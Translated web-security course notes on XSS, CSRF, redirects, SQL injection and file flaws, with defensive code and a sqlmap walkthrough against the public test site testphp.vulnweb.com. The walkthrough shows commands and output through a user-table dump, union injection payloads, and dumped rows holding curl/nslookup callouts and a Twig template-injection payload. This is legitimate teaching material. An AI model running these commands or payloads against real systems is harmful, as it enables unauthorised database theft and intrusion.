Security incidents

  • Phishing

  • Web page defacement

  • Hidden links (after gaining control of the site, modifying the page's links)

  • Webshell (after gaining control of the site, uploading a backdoor)

XSS

Cross-Site Scripting

Harm: harvesting user information, phishing, creating worms

XSS categories

  • Stored

  • Reflected

  • DOM-based

CSRF

Cross-Site Request Forgery

Concept: abusing a user's logged-in identity to carry out unauthorized operations in that user's name, without the user knowing anything about it

Harm:

  • Executing malicious operations (money transferred out of the victim's account, spam comments posted in their name, etc.)
  • Creating worms

CSRF: how it works

CSRF attack code
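The usual server-side defence against the attack described above, as an added example that is not from the original notes: a per-session token that a cross-site page cannot read, checked in constant time, plus an Origin/Referer check. The session, form and header objects are plain dicts constructed here, the helper names are my own rather than any framework's API, and SITE_ORIGIN is an assumed placeholder.

```python
# Added example, not from the original notes: CSRF protection for a
# state-changing POST. Session/form/headers are plain dicts constructed for
# the example; helper names are my own, not a framework's API.
import hmac
import secrets

SITE_ORIGIN = "https://bank.example"  # assumption: the application's own origin


def issue_csrf_token(session: dict) -> str:
    """Create an unguessable token, keep it in the server-side session and
    return it so the page can embed it in its forms. A forged cross-site
    request carries the victim's cookies but cannot read this token."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def same_site_origin(headers: dict) -> bool:
    """True if Origin (or, failing that, Referer) is absent or points at us.
    Browsers set these headers themselves; a page on another site cannot
    forge them. Matching the full origin plus '/' blocks look-alike hosts
    such as https://bank.example.evil. A missing header is tolerated only
    because the token check below is the primary control."""
    value = headers.get("Origin") or headers.get("Referer")
    if not value:
        return True
    return value == SITE_ORIGIN or value.startswith(SITE_ORIGIN + "/")


def csrf_request_allowed(session: dict, form: dict, headers: dict) -> bool:
    """Accept the request only if the submitted token equals the session
    token (constant-time compare on bytes) and the origin is our own."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False
    return same_site_origin(headers)
```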

Clickjacking

Concept

An attack in which an invisible frame is overlaid on a page to mislead the victim into clicking on it

Example

Corresponding source code

Characteristics

URL redirection

Concept

A security issue caused by an unvalidated URL redirect that sends the application's users to an unsafe third-party location.

Redirect methods

  • HTTP header redirect

  • JavaScript redirect

  • META redirect
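Whichever of the three redirect methods above is used, the fix is to validate the target before emitting it. This added example (not from the original notes) checks a user-supplied target against an allow-list of hosts and handles the usual bypasses: scheme-relative `//host`, backslashes, `user@host` tricks and non-HTTP schemes. The host name in ALLOWED_HOSTS is an assumed placeholder.

```python
# Added example, not from the original notes: validating a redirect target
# before it goes into a Location header, a JavaScript redirect or a META
# refresh. ALLOWED_HOSTS holds a constructed placeholder host.
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"app.example.com"}  # assumption: the site's own host(s)


def is_safe_redirect(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Return True only if 'target' stays on an allowed host."""
    if not target:
        return False
    # Browsers treat backslashes like slashes, so normalise before parsing;
    # otherwise '/\\evil.example' would parse as a harmless relative path.
    candidate = target.strip().replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return False  # javascript:, data: etc. are never a page location
    if parts.netloc:
        # Absolute or scheme-relative ('//evil.example') URL: compare the
        # hostname, which ignores user@ tricks like 'app.example.com@evil'.
        return (parts.hostname or "").lower() in allowed_hosts
    # No host component: must be a path on our own origin. Check the raw
    # string so 'https:/x' and '///evil.example' cannot slip through.
    return candidate.startswith("/") and not candidate.startswith("//")


def redirect_location(target: str, fallback: str = "/") -> str:
    """Value for the Location header: the validated target or the fallback."""
    return target if is_safe_redirect(target) else fallback
```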

SQL injection

Concept

A common web security vulnerability; an attacker who exploits it can read or modify data, or attack the underlying database through latent database vulnerabilities

Principle

Steps of a SQL injection

  • The application takes the user's request parameters
  • It concatenates them into its code
  • The SQL statement executes successfully as the statement we built through the crafted parameters

Prerequisites for SQL injection

  • The input data can be controlled
  • The code the server executes is built by concatenating that controlled data

Essence of SQL injection

Data and code are not separated, i.e. data is executed as code
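The three steps and the "data executed as code" point above, shown side by side in an added example that is not from the original notes: a lookup that concatenates the request parameter into the SQL text, the same lookup with a bound parameter, and an integer check in front of it. The in-memory SQLite table and its rows are constructed for the example, loosely modelled on the artists.php?artist=1 request used later on this page.

```python
# Added example, not from the original notes: why concatenated parameters
# become SQL code and bound parameters do not. Table and rows are constructed.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data; names are made up for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE artists (artist_id INTEGER, aname TEXT)")
    conn.executemany("INSERT INTO artists VALUES (?, ?)",
                     [(1, "r4w8173"), (2, "Blad3"), (3, "lyzae")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, artist: str) -> list:
    """Steps 1-2 of the process: the request parameter is pasted straight
    into the SQL text, so whatever it contains is parsed as SQL (step 3)."""
    sql = "SELECT artist_id, aname FROM artists WHERE artist_id = " + artist
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, artist: str) -> list:
    """Same query with a bound parameter: the value travels as data and can
    never alter the statement's structure, whatever characters it holds."""
    sql = "SELECT artist_id, aname FROM artists WHERE artist_id = ?"
    return conn.execute(sql, (artist,)).fetchall()


def is_valid_artist_id(artist: str) -> bool:
    """Defence in depth: an id parameter should be a plain positive integer,
    so reject anything else before it reaches the database at all."""
    return artist.isdigit() and int(artist) > 0


def lookup_validated(conn: sqlite3.Connection, artist: str) -> list:
    """Validate first, then still use the parameterised query."""
    if not is_valid_artist_id(artist):
        return []
    return lookup_safe(conn, artist)
```

A tautology such as `1 OR 1=1` returns every row from the vulnerable version, while the bound-parameter version compares the literal string and matches nothing.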

Exploiting SQL injection

Getting the system version

Getting the current database user

Harm of SQL injection

Obtaining database information

Other harms

Command injection explained

Intuitive introduction

Prerequisites for command injection

Concatenation injection

File operation vulnerabilities

Risks

File upload vulnerability

Arbitrary file download vulnerability

You can try downloading files through other URLs

Harm of the arbitrary file download vulnerability

Source code leakage, database configuration file leakage, system file leakage, etc.
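The download handler check that prevents the leakage just listed, as an added example that is not from the original notes: the requested file name is confined to one directory, so `../` sequences, absolute paths and backslash variants cannot reach source code, database configuration or system files. The download root and file names are constructed placeholders; the name is assumed to be URL-decoded already.

```python
# Added example, not from the original notes: confining a user-supplied file
# name to a download directory. DOWNLOAD_ROOT is a constructed placeholder.
import posixpath

DOWNLOAD_ROOT = "/srv/app/public/downloads"  # assumption: only this tree is served


def resolve_download(requested: str, root: str = DOWNLOAD_ROOT):
    """Return the absolute path to serve, or None if the request escapes root.
    'requested' must already be URL-decoded (exactly once) by the framework."""
    if not requested or "\x00" in requested:
        return None  # empty names and NUL bytes are never valid file names
    # Treat backslashes as separators too; some stacks accept both.
    name = requested.replace("\\", "/")
    if posixpath.isabs(name):
        return None  # '/etc/passwd'-style absolute paths are rejected outright
    root = posixpath.normpath(root)
    # normpath collapses every '..' so the escape attempt becomes visible.
    candidate = posixpath.normpath(posixpath.join(root, name))
    # commonpath compares whole components, so a sibling directory such as
    # '/srv/app/public/downloads2' does not pass as a prefix match.
    if posixpath.commonpath([root, candidate]) != root or candidate == root:
        return None
    # On a real server also realpath() the result to defeat symlink escapes.
    return candidate
```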

File inclusion vulnerability

Example

Vulnerability scanning tools

Issues to be clear about when using vulnerability scanners

  • Collateral damage to the target site

    e.g. high traffic, or triggering dangerous functions (such as deleting the database)

  • The blind spot of vulnerability scanning: logic flaws

    e.g. an order amount tampering vulnerability

Vulnerability rating

Technical perspective + business perspective

Interpreting and using scan results

  • Test cases may need adjusting
  • False positives and false negatives
  • Use scan results as leads for manual testing

SQL injection with sqlmap

Basic workflow for finding and exploiting SQL injection vulnerabilities

sqlmap command tip: single-letter abbreviations take one dash (-), full words take two (--)

SQL injection commands
Find the injection point
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1"
List users
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --users

List the databases
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs

Show the current user and database
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-user --current-db

Output

D:\Program Files\sqlmapproject-sqlmap-ae1bd21>python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-user --current-db
___
__H__
___ ___[)]_____ ___ ___ {1.8.2#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:26:36 /2024-02-07/

[20:26:36] [INFO] resuming back-end DBMS 'mysql'
[20:26:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 4968=4968

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-2189 UNION ALL SELECT NULL,CONCAT(0x71706b7071,0x686a466b4c735652456b64534a5446686752567154457779767153616d46756e43504e5772696278,0x716a6a6a71),NULL-- -
---
[20:26:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL 8
[20:26:37] [INFO] fetching current user
current user: 'acuart@localhost'
[20:26:37] [INFO] fetching current database
current database: 'acuart'
[20:26:37] [INFO] fetched data logged to text files under 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 20:26:37 /2024-02-07/
List the tables in the current database acuart
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --tables -D "acuart"

Output

D:\Program Files\sqlmapproject-sqlmap-ae1bd21>python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --tables -D "acuart"
___
__H__
___ ___[)]_____ ___ ___ {1.8.2#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:30:00 /2024-02-07/

[20:30:00] [INFO] resuming back-end DBMS 'mysql'
[20:30:00] [INFO] testing connection to the target URL
[20:30:01] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 4968=4968

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-2189 UNION ALL SELECT NULL,CONCAT(0x71706b7071,0x686a466b4c735652456b64534a5446686752567154457779767153616d46756e43504e5772696278,0x716a6a6a71),NULL-- -
---
[20:30:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL 8
[20:30:01] [INFO] fetching tables for database: 'acuart'
Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+-----------+

[20:30:01] [INFO] fetched data logged to text files under 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 20:30:01 /2024-02-07/
Query the columns of the target table in the target database
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --columns -T "users" -D "acuart"
D:\Program Files\sqlmapproject-sqlmap-ae1bd21>python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --columns -T "users" -D "acuart"
___
__H__
___ ___[(]_____ ___ ___ {1.8.2#stable}
|_ -| . [(] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:32:59 /2024-02-07/

[20:32:59] [INFO] resuming back-end DBMS 'mysql'
[20:32:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 4968=4968

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-2189 UNION ALL SELECT NULL,CONCAT(0x71706b7071,0x686a466b4c735652456b64534a5446686752567154457779767153616d46756e43504e5772696278,0x716a6a6a71),NULL-- -
---
[20:33:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL 8
[20:33:00] [INFO] fetching columns for table 'users' in database 'acuart'
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| name | varchar(100) |
| address | mediumtext |
| cart | varchar(100) |
| cc | varchar(100) |
| email | varchar(100) |
| pass | varchar(100) |
| phone | varchar(100) |
| uname | varchar(100) |
+---------+--------------+

[20:33:00] [INFO] fetched data logged to text files under 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 20:33:00 /2024-02-07/
Count the rows in the table
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --count -T "users" -D "acuart"
D:\Program Files\sqlmapproject-sqlmap-ae1bd21>python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --count -T "users" -D "acuart"
___
__H__
___ ___[']_____ ___ ___ {1.8.2#stable}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:38:15 /2024-02-07/

[20:38:16] [INFO] resuming back-end DBMS 'mysql'
[20:38:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 4968=4968

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-2189 UNION ALL SELECT NULL,CONCAT(0x71706b7071,0x686a466b4c735652456b64534a5446686752567154457779767153616d46756e43504e5772696278,0x716a6a6a71),NULL-- -
---
[20:38:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL 8
Database: acuart
+-------+---------+
| Table | Entries |
+-------+---------+
| users | 1 |
+-------+---------+

[20:38:16] [INFO] fetched data logged to text files under 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 20:38:16 /2024-02-07/
Dump the actual data
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -T "users" -D "acuart"
D:\Program Files\sqlmapproject-sqlmap-ae1bd21>python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -T "users" -D "acuart"
___
__H__
___ ___[.]_____ ___ ___ {1.8.2#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:39:46 /2024-02-07/

[20:39:47] [INFO] resuming back-end DBMS 'mysql'
[20:39:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 4968=4968

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-2189 UNION ALL SELECT NULL,CONCAT(0x71706b7071,0x686a466b4c735652456b64534a5446686752567154457779767153616d46756e43504e5772696278,0x716a6a6a71),NULL-- -
---
[20:39:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL 8
[20:39:47] [INFO] fetching columns for table 'users' in database 'acuart'
[20:39:47] [INFO] fetching entries for table 'users' in database 'acuart'
[20:39:48] [INFO] recognized possible password hashes in column 'cart'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: acuart
Table: users
[1 entry]
+---------------------+----------------------------------+------+-----------------+-----------------------------------------------------------------------------------+-------+--------------+--------------------------------------------------------------------------------------------------------------------------------------------------+
| cc | cart | pass | email | phone | uname | name | address |
+---------------------+----------------------------------+------+-----------------+-----------------------------------------------------------------------------------+-------+--------------+--------------------------------------------------------------------------------------------------------------------------------------------------+
| 1234-5678-2300-9000 | aa1041771b89328ddd3e0dbba2069227 | test | email@email.com | `(nslookup -q=cname hitdfzklrjrow9d8f0.bxss.me||curl hitdfzklrjrow9d8f0.bxss.me)` | test | Pedro Miguel | {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup 7170qtzuulqvxeuv-kkslifmkvdggunvafgi9sk0"~"deo.r87.me")}} |
+---------------------+----------------------------------+------+-----------------+-----------------------------------------------------------------------------------+-------+--------------+--------------------------------------------------------------------------------------------------------------------------------------------------+

[20:40:05] [INFO] table 'acuart.users' dumped to CSV file 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com\dump\acuart\users.csv'
[20:40:05] [INFO] fetched data logged to text files under 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 20:40:05 /2024-02-07/
Count the rows in the products table
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --count -T "products" -D "acuart"
D:\Program Files\sqlmapproject-sqlmap-ae1bd21>python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --count -T "products" -D "acuart"
___
__H__
___ ___[']_____ ___ ___ {1.8.2#stable}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:43:53 /2024-02-07/

[20:43:54] [INFO] resuming back-end DBMS 'mysql'
[20:43:54] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 4968=4968

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: artist=-2189 UNION ALL SELECT NULL,CONCAT(0x71706b7071,0x686a466b4c735652456b64534a5446686752567154457779767153616d46756e43504e5772696278,0x716a6a6a71),NULL-- -
---
[20:43:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL 8
Database: acuart
+----------+---------+
| Table | Entries |
+----------+---------+
| products | 3 |
+----------+---------+

[20:43:55] [INFO] fetched data logged to text files under 'C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com'

[*] ending @ 20:43:55 /2024-02-07/
Dump the data in the products table, reading from row 2 through row 3
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -T "products" -D "acuart" --start 2 --stop 3


Dump the data from all tables in acuart
python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump-all -D "acuart"

It was saved in the following folder:

C:\Users\HP\AppData\Local\sqlmap\output\testphp.vulnweb.com\dump\acuart
Sending a POST request to log in
python sqlmap.py -u "http://testphp.vulnweb.com/userinfo.php" --data="pass=g00dP&uname=1"

The data inside the --data quotes can be obtained from an AWVS packet capture

All of the above was done on a test site; in a real environment, confirming the injection point and the basic information is enough

Sensitive file detection

Sensitive files are like a website's secret diary: if they are not properly protected and a visitor finds them, they may expose the site's weaknesses or confidential data

Common types of sensitive files

  • Site admin backend
  • Data files
  • Backup files
  • Webshell

Detection principle

Guess file names, then use the returned HTTP status code to tell whether the file exists

http://tool.oschina.net/commons?type=5

Question 1

Scanning a PHP site with an ASP dictionary is useless

How do you determine a site's script type (ASP, PHP, ASPX, JSP, etc.)?

Answer: check the type of the index page

Question 2

Every website is different; a generic dictionary is poorly targeted and has a low hit rate. How can a targeted dictionary be generated?

Search engine syntax

  • Finding the target site's login page and brute-forcing its password

  • Checking whether the target site has leaked database files

Cyberspace search engines

SHODAN, ZoomEye, FOFA

Principle